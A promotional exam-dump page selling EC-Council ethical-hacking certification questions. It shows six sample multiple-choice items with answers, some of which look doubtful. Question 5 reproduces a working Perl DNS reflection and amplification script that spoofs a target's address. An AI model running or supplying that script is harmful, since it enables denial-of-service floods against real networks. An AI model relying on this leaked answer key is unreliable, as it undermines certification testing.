IBM 000-918 Exam PDF Braindumps IT certification Training and Preparation Tests in examsoon

examsoon offers incredible career enhancing opportunities. We are a team of IT professionals that focus on providing our customers with the most up to date material for any IT certification exam.

Exam Number/Code : EC0-350
Exam Name : ethical hacking and countermeasures
Questions and Answers : 339 Q&As
Update Time: 2009-10-08
buy now:EC0-350 test questions

EC0-350 exam give you possibility to work in any country of the world because they are acknowledged in all countries equally. This examsoon EC0-350 torrent certificate helps not only to improve your knowledge and skills, but it also helps your career, gives a possibility for qualified usage of examsoon EC0-350 exam products under different conditions.

It is well known that EC0-350 test is the hot exam of EC-COUNCIL certification. examsoon offer you all the Q&A of the EC0-350 real test . It is the examination of the perfect combination and it will help you pass EC0-350 exam at the first time!

EC0-350 questions and answers

　
　
Exam : EC-Council EC0-350
Title : Ethical Hacking and Countermeasures

1. You have chosen a 22 character word from the dictionary as your password. How long will it take to crack the password by an attacker?
A. 5 minutes
B. 23 days
C. 200 years
D. 16 million years
Answer: A

2. What hacking attack is challenge/response authentication used to prevent?
A. Replay attacks
B. Scanning attacks
C. Session hijacking attacks
D. Password cracking attacks
Answer: A

3. You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 server. The server allows you to spawn a shell. In order to perform the actions you intend to do, you need elevated permissions. You need to know what your privileges are within the shell. What are your current privileges?
A. LocalSystem
B. Administrator
C. IUSR_COMPUTERNAME
D. IIS default installation account
Answer: A

4. What is the most common vehicle for social engineering attacks?
A. Email
B. Direct in person
C. Local Area Networks
D. Peer to Peer networks
Answer: B

5. A Hacker would typically use a botnet to send a large number of queries to open DNS servers. These queries will be "spoofed" to look like they come from the target of the flooding, and the DNS server will reply to that network address.
It is generally possible to stop the more-common bot-delivered attack by blocking traffic from the attacking machines, which are identifiable. But blocking queries from DNS servers brings problems in its wake. A DNS server has a valid role to play in the workings of the Internet. Blocking traffic to a DNS server could also mean blocking legitimate users from sending e-mail or visiting a Web site. A single DNS query could trigger a response that is as much as 73 times larger than the request.
The following perl code can launch these attacks.
use Net::DNS::Resolver;
use Net::RawIP;
open(LIST,"ns.list");
@list=<LIST>;
close LIST;
chomp(@list);
my $lnum=@list;
my $i=0;
my $loop=0;
if ($ARGV[0] eq ”) {
print "Usage: ./hackme.pl <target IP> <loop count>n";
exit(0);
}
while($loop < $ARGV[1]) {
while($i < $lnum) {
my $source = $ARGV[0];
my $dnspkt = new Net::DNS::Packet("google.com","ANY");
my $pktdata = $dnspkt->data;
my $sock = new Net::RawIP({udp=>{}});
$sock->set({ip => { saddr => $source, daddr => $list[$i], frag_off=>0,tos=>0,id=>1565}, udp => {source => 53, dest => 53, data=>$pktdata} });
$sock->send;
$i++;
}$loop++; $i=0;}
exit(0);
What type of attacks are these?
A. DNS reflector and amplification attack
B. DNS cache poisoning attacks
C. DNS reverse connection attacks
D. DNS forward lookup attacks
Answer: A

6. System administrators sometimes post questions to newsgroups when they run into technical challenges. As an ethical hacker, you could use the information in newsgroup postings to glean insight into the makeup of a target network. How would you search for these posting using Google search?
A. Search in Google using the key search strings "the target company" and "newsgroups"
B. Search for the target company name at http://groups.google.com
C. Use NNTP websites to search for these postings
D. Search in Google using the key search strings "the target company" and "forums"
Answer: B

We are all well aware that a major problem in the IT industry is that there is a lack of quality study materials. Our Exam Preparation Material provides you everything you will need to take a certification examination. Like actual certification exams, our Practice Tests are in multiple-choice (MCQs) Our EC-COUNCIL EC0-350 Exam will provide you with free EC0-350 pdf dumps questions with verified answers that reflect the actual exam. These questions and answers provide you with the experience of taking the actual test. High quality and Value for the EC0-350 Exam:100% Guarantee to Pass Your Certified Ethical Hacker exam and get your EC-COUNCIL certification.